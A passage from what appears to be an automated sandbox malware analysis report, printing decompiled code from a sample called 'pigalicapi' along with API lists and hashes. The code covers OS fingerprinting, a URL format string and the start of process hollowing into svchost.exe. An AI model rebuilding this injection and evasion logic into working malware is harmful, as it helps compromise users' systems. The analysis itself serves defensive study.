                                                                                                                                                                                                                                                    											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    											_v964 = _t333;
                                                                                                                                                                                                                                                    											if(_v964 != 0) {
                                                                                                                                                                                                                                                    												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                    													E00EC7B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                    													E00EC7B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                    													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                    													E00EC7B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                    													E00EC7B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                    													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                    												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                    												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                    											E00EC7B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                    											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                    											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L79;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L83;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}
























































                                                                                                                                                                                                                                                    0x00ec4bac
                                                                                                                                                                                                                                                    0x00ec4bb5
                                                                                                                                                                                                                                                    0x00ec4bbc
                                                                                                                                                                                                                                                    0x00ec56f0
                                                                                                                                                                                                                                                    0x00ec56f0
                                                                                                                                                                                                                                                    0x00ec56fc
                                                                                                                                                                                                                                                    0x00ec4bc2
                                                                                                                                                                                                                                                    0x00ec4bcc
                                                                                                                                                                                                                                                    0x00ec4bd1
                                                                                                                                                                                                                                                    0x00ec4bdb
                                                                                                                                                                                                                                                    0x00ec4be1
                                                                                                                                                                                                                                                    0x00ec4beb
                                                                                                                                                                                                                                                    0x00ec4bf9
                                                                                                                                                                                                                                                    0x00ec4c31
                                                                                                                                                                                                                                                    0x00ec4c34
                                                                                                                                                                                                                                                    0x00ec4c49
                                                                                                                                                                                                                                                    0x00ec4c4f
                                                                                                                                                                                                                                                    0x00ec4c60
                                                                                                                                                                                                                                                    0x00ec4c66
                                                                                                                                                                                                                                                    0x00ec4c77
                                                                                                                                                                                                                                                    0x00ec4c7d
                                                                                                                                                                                                                                                    0x00ec4c84
                                                                                                                                                                                                                                                    0x00ec56eb
                                                                                                                                                                                                                                                    0x00ec4bf6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4c9e
                                                                                                                                                                                                                                                    0x00ec4ca1
                                                                                                                                                                                                                                                    0x00ec4ca4
                                                                                                                                                                                                                                                    0x00ec4cb6
                                                                                                                                                                                                                                                    0x00ec4cb3
                                                                                                                                                                                                                                                    0x00ec4cb3
                                                                                                                                                                                                                                                    0x00ec52a8
                                                                                                                                                                                                                                                    0x00ec52b2
                                                                                                                                                                                                                                                    0x00ec52eb
                                                                                                                                                                                                                                                    0x00ec52f3
                                                                                                                                                                                                                                                    0x00ec530e
                                                                                                                                                                                                                                                    0x00ec5313
                                                                                                                                                                                                                                                    0x00ec5322
                                                                                                                                                                                                                                                    0x00ec5322
                                                                                                                                                                                                                                                    0x00ec532b
                                                                                                                                                                                                                                                    0x00ec533f
                                                                                                                                                                                                                                                    0x00ec5344
                                                                                                                                                                                                                                                    0x00ec5347
                                                                                                                                                                                                                                                    0x00ec534e
                                                                                                                                                                                                                                                    0x00ec56b8
                                                                                                                                                                                                                                                    0x00ec56c3
                                                                                                                                                                                                                                                    0x00ec56d4
                                                                                                                                                                                                                                                    0x00ec56e5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec5354
                                                                                                                                                                                                                                                    0x00ec5354
                                                                                                                                                                                                                                                    0x00ec5362
                                                                                                                                                                                                                                                    0x00ec537f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec5397
                                                                                                                                                                                                                                                    0x00ec539d
                                                                                                                                                                                                                                                    0x00ec53a0
                                                                                                                                                                                                                                                    0x00ec53ca
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec53d0
                                                                                                                                                                                                                                                    0x00ec53da
                                                                                                                                                                                                                                                    0x00ec53fd
                                                                                                                                                                                                                                                    0x00ec5403
                                                                                                                                                                                                                                                    0x00ec5439
                                                                                                                                                                                                                                                    0x00ec543e
                                                                                                                                                                                                                                                    0x00ec5441
                                                                                                                                                                                                                                                    0x00ec544e
                                                                                                                                                                                                                                                    0x00ec569b
                                                                                                                                                                                                                                                    0x00ec56a2
                                                                                                                                                                                                                                                    0x00ec56b2
                                                                                                                                                                                                                                                    0x00ec56b2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec56a2
                                                                                                                                                                                                                                                    0x00ec545e
                                                                                                                                                                                                                                                    0x00ec5477
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec548b
                                                                                                                                                                                                                                                    0x00ec5491
                                                                                                                                                                                                                                                    0x00ec549b
                                                                                                                                                                                                                                                    0x00ec54a5
                                                                                                                                                                                                                                                    0x00ec54c0
                                                                                                                                                                                                                                                    0x00ec54f5
                                                                                                                                                                                                                                                    0x00ec54fa
                                                                                                                                                                                                                                                    0x00ec54fd
                                                                                                                                                                                                                                                    0x00ec550d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec551d
                                                                                                                                                                                                                                                    0x00ec54ba
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec54ba
                                                                                                                                                                                                                                                    0x00ec550d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec551f
                                                                                                                                                                                                                                                    0x00ec551f
                                                                                                                                                                                                                                                    0x00ec5526
                                                                                                                                                                                                                                                    0x00ec5533
                                                                                                                                                                                                                                                    0x00ec5540
                                                                                                                                                                                                                                                    0x00ec5598
                                                                                                                                                                                                                                                    0x00ec55ae
                                                                                                                                                                                                                                                    0x00ec55b4
                                                                                                                                                                                                                                                    0x00ec55c1
                                                                                                                                                                                                                                                    0x00ec55d8
                                                                                                                                                                                                                                                    0x00ec5631
                                                                                                                                                                                                                                                    0x00ec5654
                                                                                                                                                                                                                                                    0x00ec5659
                                                                                                                                                                                                                                                    0x00ec55da
                                                                                                                                                                                                                                                    0x00ec55ef
                                                                                                                                                                                                                                                    0x00ec5612
                                                                                                                                                                                                                                                    0x00ec5617
                                                                                                                                                                                                                                                    0x00ec5617
                                                                                                                                                                                                                                                    0x00ec566b
                                                                                                                                                                                                                                                    0x00ec567c
                                                                                                                                                                                                                                                    0x00ec568b
                                                                                                                                                                                                                                                    0x00ec568b
                                                                                                                                                                                                                                                    0x00ec5542
                                                                                                                                                                                                                                                    0x00ec5552
                                                                                                                                                                                                                                                    0x00ec555b
                                                                                                                                                                                                                                                    0x00ec5573
                                                                                                                                                                                                                                                    0x00ec5578
                                                                                                                                                                                                                                                    0x00ec5584
                                                                                                                                                                                                                                                    0x00ec5584
                                                                                                                                                                                                                                                    0x00ec5695
                                                                                                                                                                                                                                                    0x00ec5695
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec5526
                                                                                                                                                                                                                                                    0x00ec545e
                                                                                                                                                                                                                                                    0x00ec534e
                                                                                                                                                                                                                                                    0x00ec4c84
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4bf9

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00EC4BAC
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00EC4BDB
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 00EC4C19
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00EC4C49
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00EC4C60
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00EC4C77
                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EC56F0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                    • String ID: $`$http://www.%s$pigalicapi
                                                                                                                                                                                                                                                    • API String ID: 1834614700-967124566
                                                                                                                                                                                                                                                    • Opcode ID: 2f7b6b5501f2817fb33b2e6ef25d15fa67fee5ee2bf4abc35d29f96045e68b60
                                                                                                                                                                                                                                                    • Instruction ID: 41a63390f8ef38d761e1e8e48fb7fa799a5f66b6f5fa73b8eb1be88e2a9c9d2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f7b6b5501f2817fb33b2e6ef25d15fa67fee5ee2bf4abc35d29f96045e68b60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D62AFB5D00214EFDB14DB90DD45FEEB7B4BB48306F04919DF6097A282D772AA86CB60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 204 ec8f80-ec8f94 205 ec8f9a-ec8f9e 204->205 206 ec927b-ec9281 204->206 205->206 207 ec8fa4-ec8fa8 205->207 207->206 208 ec8fae-ec8fff call ec7d20 * 3 GetVersionExA 207->208 215 ec9005-ec9016 GetSystemInfo 208->215 216 ec9266-ec926a 208->216 218 ec901c-ec9023 215->218 219 ec9115-ec911c 215->219 216->206 217 ec926c-ec9275 lstrcatA 216->217 217->206 222 ec9025-ec903d lstrcatA 218->222 223 ec9042-ec9049 218->223 220 ec9210-ec9217 call ec9290 219->220 221 ec9122-ec9129 219->221 237 ec9228-ec9237 lstrlenA 220->237 238 ec9219-ec9222 lstrcatA 220->238 226 ec912b-ec9132 221->226 227 ec9174-ec917b 221->227 229 ec9110 222->229 224 ec9068-ec906f 223->224 225 ec904b-ec9063 lstrcatA 223->225 224->229 231 ec9075-ec907c 224->231 225->229 234 ec914e-ec9155 226->234 235 ec9134-ec914c lstrcatA 226->235 232 ec917d-ec9184 227->232 233 ec91c3-ec91ca 227->233 229->220 240 ec907e-ec9085 231->240 241 ec90a1-ec90ab GetSystemMetrics 231->241 242 ec9186-ec919e lstrcatA 232->242 243 ec91a0-ec91a7 232->243 233->220 244 ec91cc-ec91d3 233->244 236 ec916f 234->236 239 ec9157-ec9169 lstrcatA 234->239 235->236 236->220 245 ec9259-ec9263 lstrlenA 237->245 246 ec9239-ec9253 lstrcatA * 2 237->246 238->237 239->236 240->241 247 ec9087-ec909f lstrcatA 240->247 248 ec90ad-ec90c5 lstrcatA 241->248 249 ec90c7-ec90d1 GetSystemMetrics 241->249 250 ec91c1 242->250 243->250 251 ec91a9-ec91bb lstrcatA 243->251 252 ec91ef-ec91f6 244->252 253 ec91d5-ec91ed lstrcatA 244->253 245->216 246->245 247->229 248->229 254 ec90ed-ec90f6 249->254 255 ec90d3-ec90eb lstrcatA 249->255 250->220 251->250 252->220 256 ec91f8-ec920a lstrcatA 252->256 253->220 254->229 257 ec90f8-ec910a lstrcatA 254->257 255->229 256->220 257->229
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC8F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                    				signed int _v50;
                                                                                                                                                                                                                                                    				signed short _v52;
                                                                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                    					L45:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					E00EC7D20(E00EC7D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                    					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                    					E00EC7D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                    					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                    						L43:
                                                                                                                                                                                                                                                    						if(_v8 == 0) {
                                                                                                                                                                                                                                                    							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L45;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                    					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                    						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                    							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                    								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                    									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                    										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                    											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                    												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                    												 *_a12 = 0xb;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                    											 *_a12 = 0xc;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                    										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                    											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                    											 *_a12 = 8;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                    										 *_a12 = 0xa;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                    									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                    										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                    										 *_a12 = 9;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                    									 *_a12 = 7;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						L38:
                                                                                                                                                                                                                                                    						if(E00EC9290() != 0) {
                                                                                                                                                                                                                                                    							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                    							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                    							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                    						goto L43;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                    						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                    							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                    								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                    									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                    										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                    											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                    												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                    												 *_a12 = 4;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                    											 *_a12 = 6;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                    										 *_a12 = 5;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                    									 *_a12 = 3;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                    							 *_a12 = 2;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                    						 *_a12 = 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L38;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                    0x00ec8f89
                                                                                                                                                                                                                                                    0x00ec8f94
                                                                                                                                                                                                                                                    0x00ec927b
                                                                                                                                                                                                                                                    0x00ec9281
                                                                                                                                                                                                                                                    0x00ec8fae
                                                                                                                                                                                                                                                    0x00ec8fce
                                                                                                                                                                                                                                                    0x00ec8fd6
                                                                                                                                                                                                                                                    0x00ec8fe8
                                                                                                                                                                                                                                                    0x00ec8fff
                                                                                                                                                                                                                                                    0x00ec9266
                                                                                                                                                                                                                                                    0x00ec926a
                                                                                                                                                                                                                                                    0x00ec9275
                                                                                                                                                                                                                                                    0x00ec9275
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec926a
                                                                                                                                                                                                                                                    0x00ec9009
                                                                                                                                                                                                                                                    0x00ec9016
                                                                                                                                                                                                                                                    0x00ec911c
                                                                                                                                                                                                                                                    0x00ec9129
                                                                                                                                                                                                                                                    0x00ec917b
                                                                                                                                                                                                                                                    0x00ec91ca
                                                                                                                                                                                                                                                    0x00ec91d3
                                                                                                                                                                                                                                                    0x00ec91f6
                                                                                                                                                                                                                                                    0x00ec9201
                                                                                                                                                                                                                                                    0x00ec920a
                                                                                                                                                                                                                                                    0x00ec920a
                                                                                                                                                                                                                                                    0x00ec91d5
                                                                                                                                                                                                                                                    0x00ec91de
                                                                                                                                                                                                                                                    0x00ec91e7
                                                                                                                                                                                                                                                    0x00ec91e7
                                                                                                                                                                                                                                                    0x00ec91d3
                                                                                                                                                                                                                                                    0x00ec917d
                                                                                                                                                                                                                                                    0x00ec9184
                                                                                                                                                                                                                                                    0x00ec91a7
                                                                                                                                                                                                                                                    0x00ec91b2
                                                                                                                                                                                                                                                    0x00ec91bb
                                                                                                                                                                                                                                                    0x00ec91bb
                                                                                                                                                                                                                                                    0x00ec9186
                                                                                                                                                                                                                                                    0x00ec918f
                                                                                                                                                                                                                                                    0x00ec9198
                                                                                                                                                                                                                                                    0x00ec9198
                                                                                                                                                                                                                                                    0x00ec91c1
                                                                                                                                                                                                                                                    0x00ec912b
                                                                                                                                                                                                                                                    0x00ec9132
                                                                                                                                                                                                                                                    0x00ec9155
                                                                                                                                                                                                                                                    0x00ec9160
                                                                                                                                                                                                                                                    0x00ec9169
                                                                                                                                                                                                                                                    0x00ec9169
                                                                                                                                                                                                                                                    0x00ec9134
                                                                                                                                                                                                                                                    0x00ec913d
                                                                                                                                                                                                                                                    0x00ec9146
                                                                                                                                                                                                                                                    0x00ec9146
                                                                                                                                                                                                                                                    0x00ec916f
                                                                                                                                                                                                                                                    0x00ec9129
                                                                                                                                                                                                                                                    0x00ec9210
                                                                                                                                                                                                                                                    0x00ec9217
                                                                                                                                                                                                                                                    0x00ec9222
                                                                                                                                                                                                                                                    0x00ec9222
                                                                                                                                                                                                                                                    0x00ec9237
                                                                                                                                                                                                                                                    0x00ec9242
                                                                                                                                                                                                                                                    0x00ec9253
                                                                                                                                                                                                                                                    0x00ec9253
                                                                                                                                                                                                                                                    0x00ec9263
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec9263
                                                                                                                                                                                                                                                    0x00ec9023
                                                                                                                                                                                                                                                    0x00ec9049
                                                                                                                                                                                                                                                    0x00ec906f
                                                                                                                                                                                                                                                    0x00ec907c
                                                                                                                                                                                                                                                    0x00ec90ab
                                                                                                                                                                                                                                                    0x00ec90d1
                                                                                                                                                                                                                                                    0x00ec90f6
                                                                                                                                                                                                                                                    0x00ec9101
                                                                                                                                                                                                                                                    0x00ec910a
                                                                                                                                                                                                                                                    0x00ec910a
                                                                                                                                                                                                                                                    0x00ec90d3
                                                                                                                                                                                                                                                    0x00ec90dc
                                                                                                                                                                                                                                                    0x00ec90e5
                                                                                                                                                                                                                                                    0x00ec90e5
                                                                                                                                                                                                                                                    0x00ec90ad
                                                                                                                                                                                                                                                    0x00ec90b6
                                                                                                                                                                                                                                                    0x00ec90bf
                                                                                                                                                                                                                                                    0x00ec90bf
                                                                                                                                                                                                                                                    0x00ec9087
                                                                                                                                                                                                                                                    0x00ec9090
                                                                                                                                                                                                                                                    0x00ec9099
                                                                                                                                                                                                                                                    0x00ec9099
                                                                                                                                                                                                                                                    0x00ec907c
                                                                                                                                                                                                                                                    0x00ec904b
                                                                                                                                                                                                                                                    0x00ec9054
                                                                                                                                                                                                                                                    0x00ec905d
                                                                                                                                                                                                                                                    0x00ec905d
                                                                                                                                                                                                                                                    0x00ec9025
                                                                                                                                                                                                                                                    0x00ec902e
                                                                                                                                                                                                                                                    0x00ec9037
                                                                                                                                                                                                                                                    0x00ec9037
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec9110

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(0000009C), ref: 00EC8FF7
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 00EC9009
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,Win2K), ref: 00EC902E
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,WinXP), ref: 00EC9054
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,Vista), ref: 00EC913D
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 00EC9160
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 00EC918F
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,Win7), ref: 00EC91B2
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 00EC91DE
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,Win8), ref: 00EC9201
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,_x64), ref: 00EC9222
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00EC922F
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00ECC980), ref: 00EC9242
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 00EC9253
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC925D
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 00EC9275
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                    • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                    • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                    • Opcode ID: 9810c8c5dc21a3e6f085dbc1b839cb9894b6a021bd27d24dc6dce5859e975ca0
                                                                                                                                                                                                                                                    • Instruction ID: eba7914ff7d2f3da727f8e046352eb2ce3661e3d3c47d1ac7ebad710ee51e984
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9810c8c5dc21a3e6f085dbc1b839cb9894b6a021bd27d24dc6dce5859e975ca0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16819D74A00309EFDB248F60DE4EFAE7B74BB09305F249548F849B6291C776D986DB60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC20B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                                                                    				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                    				intOrPtr _v1016;
                                                                                                                                                                                                                                                    				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                    				intOrPtr _v1096;
                                                                                                                                                                                                                                                    				void _v1100;
                                                                                                                                                                                                                                                    				signed int _v1104;
                                                                                                                                                                                                                                                    				CHAR* _t121;
                                                                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                                                                    				int _t130;
                                                                                                                                                                                                                                                    				void* _t132;
                                                                                                                                                                                                                                                    				int _t140;
                                                                                                                                                                                                                                                    				int _t143;
                                                                                                                                                                                                                                                    				int _t145;
                                                                                                                                                                                                                                                    				int _t148;
                                                                                                                                                                                                                                                    				void* _t263;
                                                                                                                                                                                                                                                    				void* _t265;
                                                                                                                                                                                                                                                    				void* _t266;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                                                                                                    					L26:
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                    				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                    				if(_a12 != 0) {
                                                                                                                                                                                                                                                    					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                    					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E00EC7D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                    				E00EC7D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                    				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                    				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                    				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                    				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                    				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                    				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
